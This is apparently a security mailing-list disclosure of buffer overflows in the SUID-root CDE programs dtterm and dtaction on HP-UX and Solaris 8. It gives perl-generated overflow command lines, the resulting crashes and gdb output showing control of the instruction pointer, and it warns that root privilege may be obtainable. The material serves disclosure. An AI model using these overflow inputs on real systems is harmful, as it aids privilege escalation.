Hi there, This also works on HP-UX: ====================================================================== # uname -a HP-UX moon B.11.00 (snip) # ls -l /usr/dt/bin/dtterm -r-sr-xr-x 1 root bin 65536 May 26 1999 /usr/dt/bin/dtterm # /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'` Memory fault(coredump) # uname -a HP-UX moon B.10.20 A 9000/785 (snip) # ls -l /usr/dt/bin/dtterm -r-sr-xr-x 1 root bin 53248 May 11 1999 /usr/dt/bin/dtterm # /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'` Memory fault(coredump) ====================================================================== And we noticed /usr/dt/bin/dtaction on Solaris 8 and HP-UX 10.20 will cause buffer overflow: ====================================================================== (SPARC/Solaris 8) # uname -a SunOS unknown 5.8 Generic_108528-10 sun4u sparc SUNW,Sun-Blade-100 # ls -la /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 22808 Dec 2 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'` Segmentation Fault (intel/Solaris 8) # uname -a SunOS unknown 5.8 Generic_108529-09 i86pc i386 i86pc # ls -la /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 22496 Dec 2 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'` Segmentation Fault # gdb /usr/dt/bin/dtaction --core=core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-pc-solaris2.8"... (no debugging symbols found)... Core was generated by `./dtaction -tn AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation Fault. Reading symbols from /usr/dt/lib/libDtSvc.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/dt/lib/libDtSvc.so.1 Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)... done. Loaded symbols for /usr/dt/lib/libXm.so.4 Reading symbols from /usr/openwin/lib/libXt.so.4... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libXt.so.4 Reading symbols from /usr/openwin/lib/libX11.so.4... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libX11.so.4 Reading symbols from /usr/dt/lib/libSDtFwa.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/dt/lib/libSDtFwa.so.1 Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libc.so.1 Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)... ---Type <return> to continue, or q <return> to quit--- done. Loaded symbols for /usr/dt/lib/libtt.so.2 Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libsocket.so.1 Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libnsl.so.1 Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libdl.so.1 Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libgen.so.1 Reading symbols from /usr/openwin/lib/libSM.so.6... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libSM.so.6 Reading symbols from /usr/openwin/lib/libICE.so.6... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libICE.so.6 Reading symbols from /usr/openwin/lib/libXext.so.0... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libXext.so.0 Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libmp.so.2 Reading symbols from /usr/openwin/lib/libdga.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libdga.so.1 Reading symbols from /usr/lib//liblayout.so...(no debugging symbols found)... done. Loaded symbols for /usr/lib//liblayout.so Reading symbols from /usr/lib/nss_files.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/nss_files.so.1 #0 0xdf004141 in ?? () (gdb) bt #0 0xdf004141 in ?? () Cannot access memory at address 0x41414141 (HP-UX 10.20) # uname -a HP-UX moon B.10.20 A 9000/785 (snip) # ls -l /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 45056 Feb 5 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1083'` Memory fault(coredump) # These /usr/dt/bin/dtaction are installed as SUID root. Therefore, it might be possible to gain root privilege. Regards, ----------------------------------------------- ARAI Yuu <y.arai@lac.co.jp> Network Security Specialist / LAC Computer Security Laboratory http://www.lac.co.jp/security/
